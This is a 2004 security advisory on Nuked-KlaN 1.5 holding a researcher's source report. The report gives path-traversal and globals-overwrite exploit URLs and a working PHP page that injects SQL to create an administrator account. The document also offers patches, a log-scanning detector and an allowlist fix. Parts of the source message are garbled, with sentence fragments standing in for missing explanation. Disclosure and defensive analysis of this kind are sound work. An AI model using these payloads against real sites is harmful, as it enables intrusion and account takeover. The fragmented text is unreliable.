SecurityTracker.com
SecurityTracker Archives

Category: Application (Forum/Board/Portal) > NuKed-KlaN
Vendors: nuked-klan.org
NuKed-KlaN Input Validation Bugs Disclose Files to Remote Users and Let Remote Users Include Local Files
SecurityTracker Alert ID: 1009737
SecurityTracker URL: http://securitytracker.com/id/1009737
CVE Reference: GENERIC-MAP-NOMATCH
Date: Apr 12 2004
Impact: Denial of service via network, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 1.5 SP2 and prior versions
Description:   Some vulnerabilities were reported in NuKed-KlaN. A remote user can view files on the target system. A remote user can also include and execute files located on the target system and can overwrite the configuration file.

frog-m@n reported that a remote user can create a URL with a specially crafted $language variable to view files on the target system with the privileges of the web service. A demonstration exploit URL is provided:

http://[target]/index.php?user_langue=../../../../../file/to/view

It is also reported that a remote user can submit a specially crafted URL to redefine global variables. This allows the remote user to include and execute files that are located on the target system. A demonstration exploit URL is provided:

http://[target]/index.php?file=..&page=globals

It is also reported that the 'update.php' function allows a remote user to overwrite the site's configuration file, causing denial of service conditions.

Impact:   A remote user can view files on the target system with the privileges of the target web service.

A remote user can include and execute scripting files located on the target system.

A remote user can cause the configuration file to be overwritten.
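For a defender checking whether these request shapes were ever sent to a site, here is an added example (it is not part of the SecurityTracker advisory, the source message below, or Nuked-KlaN itself) that scans Apache combined-format access-log lines for the three patterns the advisory describes: a traversal sequence or NUL byte in a parameter that ends up in an include() path, the file=..&page=globals re-inclusion of globals.php, and nuked[...] query keys that try to replace the configuration array. The log lines are constructed for the demo; the parameter names theme and langue, beyond user_langue, file and page, are taken from the source message further down this page.

```python
"""Flag access-log requests matching the Nuked-KlaN request patterns in this
advisory. Added example, not advisory or project code; SAMPLE_LOG is
constructed, not captured from a real server."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined format.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2004:10:01:02 +0000] "GET /index.php?file=News HTTP/1.1" 200 5120 "-" "Mozilla"
10.0.0.9 - - [12/Apr/2004:10:02:15 +0000] "GET /index.php?user_langue=../../../../../etc/passwd HTTP/1.1" 200 1480 "-" "curl"
10.0.0.9 - - [12/Apr/2004:10:02:40 +0000] "GET /index.php?file=..&page=globals HTTP/1.1" 200 312 "-" "curl"
10.0.0.9 - - [12/Apr/2004:10:03:01 +0000] "GET /index.php?file=Suggest&op=add_sug&user_langue=../globals.php&nuked%5Bprefix%5D=attacker_chosen_&module=Gallery HTTP/1.1" 200 90 "-" "curl"
10.0.0.7 - - [12/Apr/2004:10:04:00 +0000] "GET /index.php?user_langue=french.lang.php HTTP/1.1" 200 5120 "-" "Mozilla"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Parameters the vulnerable code interpolates into include() paths.
PATH_PARAMS = ("user_langue", "file", "page", "theme", "langue")

def classify_request(target):
    """Return indicator names for one request target (path plus query);
    an empty list means nothing suspicious was found."""
    hits = []
    params = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so a double-encoded
        # "%252e%252e" is seen as ".." too.
        params.setdefault(key, []).append(unquote(value))

    for name in PATH_PARAMS:
        for value in params.get(name, []):
            if ".." in value or "\x00" in value:
                hits.append("traversal:" + name)
            if name == "user_langue" and "globals.php" in value:
                hits.append("globals_include")
    # file=..&page=globals makes index.php include globals.php a second time,
    # re-running nk_globals() after conf.inc.php has been loaded.
    if ".." in params.get("file", []) and "globals" in params.get("page", []):
        hits.append("globals_reinclude")
    # nuked[...] keys attempt to overwrite the $nuked configuration array.
    if any(key.startswith("nuked[") for key in params):
        hits.append("config_override")
    return hits

def scan_log(text):
    """Return (client_ip, target, indicators) for every line with indicators."""
    flagged = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        indicators = classify_request(m.group("target"))
        if indicators:
            flagged.append((m.group("ip"), m.group("target"), indicators))
    return flagged

if __name__ == "__main__":
    for ip, target, indicators in scan_log(SAMPLE_LOG):
        print(ip, ",".join(indicators), target)
```

The checks are deliberately keyed on the parameters that reach include() rather than on ".." anywhere in the URL, so a legitimate language name such as the last sample line is not flagged; a blocked request (HTTP 403 or 404) still matters here, since the status code is not used to decide.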

Solution:   The vendor has released a patch, available at:

http://nk.gamez.solexine.fr/index.php?file=Download&op=description&dl_id=194

Vendor URL: www.nuked-klan.org/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt


http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt

Nuked-KlaN
**********
Information:
Language: PHP
Version: b1.5, b1.4 (and earlier?)
Website: http://www.nuked-klan.org
- Configuration file overwrite
- Local file inclusion

Details:
Nuked-KlaN is a complete CMS with several modules, and it allows further modules to be added; in short, it is in the style of PHP-Nuke.
----------------------
include ("nuked.php");
----------------------
In this file, nuked.php, we see the lines:
---------------------------------------------------
[...]
include ("conf.inc.php");
[...]
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}

include ("lang/$language");
[...]
---------------------------------------------------
A file "lang/$language" is therefore included.
Any file on the disk can thus be included with a URL of the form:
http://[target]/index.php?user_langue=../../../../../file/to/view
and this applies to versions b1.5 and earlier.

Several other flaws are found only in this version, b1.5.
The file globals.php contains the following lines:
-------------------------------
[...]
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
[...]
-------------------------------
---------------------------------------------------
function nk_globals($table) {
	if (is_array($GLOBALS[$table])) {
		reset($GLOBALS[$table]);
		while (list($key, $val) = each($GLOBALS[$table])) {
			$GLOBALS[$key] = $val;
		}
	}
}
---------------------------------------------------
found in the $table variable.
the SERVER variables.
the GET, POST and COOKIE variables
means that these variables
old values.


the code:
-------------------------------------------------------
[...]
if($page!=""){$im_file="$page";}else{$im_file="index";}
}

if (is_file("modules/$file/$im_file.php") ){
include("modules/$file/$im_file.php");
}else{
include("modules/404/index.php");
}
[...]
-------------------------------------------------------
http://[target]/index.php?file=..&page=globals
for example with the URL:
http://[target]/index.php?user_langue=../globals.php
configuration in any module! For example, in the Suggest module (modules/Suggest/index.php), we see:
---------------------------------------------------------------------------------------------------------------
[...]
function add_sug($data)
{
global $user, $module, $nuked;

opentable();

include("modules/Suggest/modules/$module.php");
$date=time();
$content=make_array($data);
$sql=mysql_query("INSERT INTO $nuked[prefix]"._suggest." VALUES 
('','$module','$user[0]','$content','$date')");
echo"<br><center>"._YOURSUGGEST."<br>"._THXPART."</center><br>";
redirect("index.php?file=$module",2);

closetable();
}
[...]
---------------------------------------------------------------------------------------------------------------
a record in any table.
----------------------------------------------------------------------------------------------------------------------------
<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo 
"<script>url='".$target."/index.php?file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST["pseudo"])."),md5(char(".ascii_sql($_POST["pass"]).")),9)/*&module
=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------------

There we find the code:
----------------------------------------------------------------------------------
<?

[...]

include ("globals.php");

[...]

function install()
{
global $langue;
include ("lang/$langue");

[...]
}
[...]


function edit_config($op)
{
global $langue,$langname;

include ("lang/$langue");

[...]
}
[...]

function update_config($vars)
{
[...]
include ("lang/$vars[langue]");
[...]
	$content = "<?php // Generated: $d\n"
	[...]
	."\$global['db_host']  = '$vars[db_host]';\n"
	."\$global['db_user']  = '$vars[db_user]';\n"
	."\$global['db_pass']  = '$vars[db_pass]';\n"
	."\$global['db_name']  = '$vars[db_name]';\n"
	."\$global['type']     = '$vars[type]';\n"
	."\$nuked['prefix']    = \"$vars[prefix]\";\n"
	[...]
	."\$nuked['url'] = '$vars[url]';\n"
	[...]
	.'?'.'>';

	$fp = fopen('conf.inc.php', w);
	if (!$fp) die (sprintf('Erreur File Open','conf.inc.php','conf.inc.php'));
	fwrite($fp, $content);
	fclose($fp);
[...]
}

[...]

switch ($action)
{
[...]
case"edit_config":
edit_config($_GET['op']);
break;

case"update_config":
update_config($_POST);
break;

case"install":
install();
break;
[...]
}

?>
----------------------------------------------------------------------------------

taking the site down.

that infamous globals.php file.

Solution:
A patch is available on phpSecure ( http://www.phpsecure.info ).
In globals.php, replace the lines:
-------------------------------
nk_globals('HTTP_GET_VARS');
nk_globals('HTTP_POST_VARS');
nk_globals('HTTP_COOKIE_VARS');
nk_globals('HTTP_SERVER_VARS');
-------------------------------
with:
---------------------------------------
// ini_get() is the PHP function that reads a php.ini setting; the original
// text wrote get_ini(), which does not exist. Emulate register_globals only
// when PHP is not already doing it.
if (!ini_get("register_globals")){
	nk_globals('HTTP_GET_VARS');
	nk_globals('HTTP_POST_VARS');
	nk_globals('HTTP_COOKIE_VARS');
	nk_globals('HTTP_SERVER_VARS');
}
---------------------------------------

And in nuked.php, replace the lines:
----------------------------------------------------
function nk_globals($table) {
	if (is_array($GLOBALS[$table])) {
		reset($GLOBALS[$table]);
		while (list($key, $val) = each($GLOBALS[$table])) {
			$GLOBALS[$key] = $val;
		}
	}
}
----------------------------------------------------
with:
-----------------------------------------------------------------------------
function nk_globals($table) {
	if (is_array($GLOBALS[$table])) {
		reset($GLOBALS[$table]);
		while (list($key, $val) = each($GLOBALS[$table])) {
			// Only create globals that do not exist yet, so request data can
			// never replace a value already set by conf.inc.php.
			if (!isset($GLOBALS[$key])){ $GLOBALS[$key] = $val; }
		}
	}
}
-----------------------------------------------------------------------------
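To see exactly what the isset() check changes, here is an added Python model (a re-implementation for illustration, not Nuked-KlaN code and not the advisory's patch) of nk_globals() before and after the fix, including the way PHP turns a nuked[prefix]=... query key into a nested array. In the unpatched version the request array replaces the whole $nuked configuration array loaded from conf.inc.php; in the patched version the configured values win because they are already set. The configuration values and query strings are constructed.

```python
"""Model of Nuked-KlaN's nk_globals() register_globals emulation, unpatched
and patched. Added example: a Python re-implementation of the PHP quoted in
the advisory, with constructed config and request values."""
import re
from urllib.parse import parse_qsl

# One nesting level is enough to model nuked[prefix]=value.
KEY_RE = re.compile(r"^([^\[]+)\[([^\]]*)\]$")

def php_query_to_array(query):
    """Parse a query string the way PHP fills HTTP_GET_VARS: the key
    nuked[prefix]=x becomes {'nuked': {'prefix': 'x'}}."""
    result = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = KEY_RE.match(key)
        if m:
            result.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            result[key] = value
    return result

def nk_globals_original(scope, table):
    """Unpatched: every entry of the request array overwrites the global of
    the same name, including one set earlier by conf.inc.php."""
    for key, value in scope.get(table, {}).items():
        scope[key] = value

def nk_globals_patched(scope, table):
    """Patched: a global is created only if it does not exist yet."""
    for key, value in scope.get(table, {}).items():
        if key not in scope:
            scope[key] = value

def load_config():
    """Stand-in for conf.inc.php (constructed values)."""
    return {"prefix": "nk_", "langue": "french.lang.php"}

def run_request(query, patched):
    """Simulate index.php: conf.inc.php is included, then globals.php runs
    nk_globals() over the GET array; return what $nuked holds afterwards."""
    scope = {
        "nuked": load_config(),
        "HTTP_GET_VARS": php_query_to_array(query),
    }
    register = nk_globals_patched if patched else nk_globals_original
    register(scope, "HTTP_GET_VARS")
    return scope["nuked"]

if __name__ == "__main__":
    print("unpatched:", run_request("nuked[prefix]=attacker_chosen_", False))
    print("patched:  ", run_request("nuked[prefix]=attacker_chosen_", True))
```

The patched version still lets a request create any global the script has not defined yet, which is the usual register_globals hazard; the isset() check only protects values assigned before globals.php runs, so it matters that conf.inc.php is included first.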

--------------------------------------------------
if ($user_langue == ""){$language=$nuked[langue];}
else {$language=$user_langue;}
--------------------------------------------------
add the lines:
-----------------------------------------------------------------------
if ( eregi("\.\.",$theme) || eregi("\.\.",$page) || eregi("\.\.",$file)
     || eregi("\0",$theme) || eregi("\0",$page) || eregi("\0",$file) ||
     eregi("\.\.",$user_langue) || !file_exists("lang/$language") ){
	die("What are you trying to do ?");
}
-----------------------------------------------------------------------
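The check above rejects known-bad strings. As an added example, not the advisory's patch and not project code, here is the allowlist form of the same protection for an include("lang/$language")-style lookup: the name must look like a language file, and the resolved path must stay inside lang/ and exist, with anything else falling back to the configured default. The directory tree, the file names and the default name french.lang.php are constructed for the demo.

```python
"""Allowlist-based resolution of a user-supplied language file name for an
include("lang/$language")-style lookup. Added example, not the advisory's
patch and not Nuked-KlaN code; the lang/ tree built in demo() is constructed."""
import os
import re
import tempfile

# A language file is a simple name ending in .lang.php: no separators, no
# dots other than the two in the suffix, no NUL bytes, no percent-encoding.
NAME_RE = re.compile(r"\A[A-Za-z0-9_-]+\.lang\.php\Z")

def resolve_language_file(lang_dir, requested, default):
    """Return the absolute path of the language file to include.

    Falls back to `default` (a file name inside lang_dir) when the request is
    empty, does not look like a language file, resolves outside lang_dir, or
    does not exist. The allowlist runs first so a NUL byte never reaches the
    filesystem calls."""
    name = requested or default
    if not NAME_RE.match(name):
        name = default
    base = os.path.realpath(lang_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # realpath() follows symlinks, so a link planted inside lang/ that points
    # elsewhere is also rejected by the containment check.
    if os.path.dirname(candidate) != base or not os.path.isfile(candidate):
        candidate = os.path.join(base, default)
    return candidate

def demo():
    """Build a throwaway tree (constructed) and map each request value to the
    file that would be included, relative to the site root."""
    root = os.path.realpath(tempfile.mkdtemp())
    lang = os.path.join(root, "lang")
    os.mkdir(lang)
    for fname in ("french.lang.php", "english.lang.php"):
        open(os.path.join(lang, fname), "w").close()
    # A sibling file outside lang/, like globals.php in the advisory.
    open(os.path.join(root, "globals.php"), "w").close()
    cases = ["english.lang.php", "", "../globals.php",
             "../../../../../etc/passwd", "french.lang.php\x00.txt",
             "missing.lang.php"]
    return {req: os.path.relpath(resolve_language_file(lang, req, "french.lang.php"), root)
            for req in cases}

if __name__ == "__main__":
    for req, chosen in demo().items():
        print(repr(req), "->", chosen)
```

Compared with the eregi() checks, this form needs no list of bad substrings: a name that is not on the allowlist is never joined to the path, and the realpath() comparison catches anything the pattern might miss, including symlinks inside lang/.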

Credits:
Author: frog-m@n
E-mail: leseulfrog@hotmail.com
Website: http://www.phpsecure.info
Date: 23/03/04
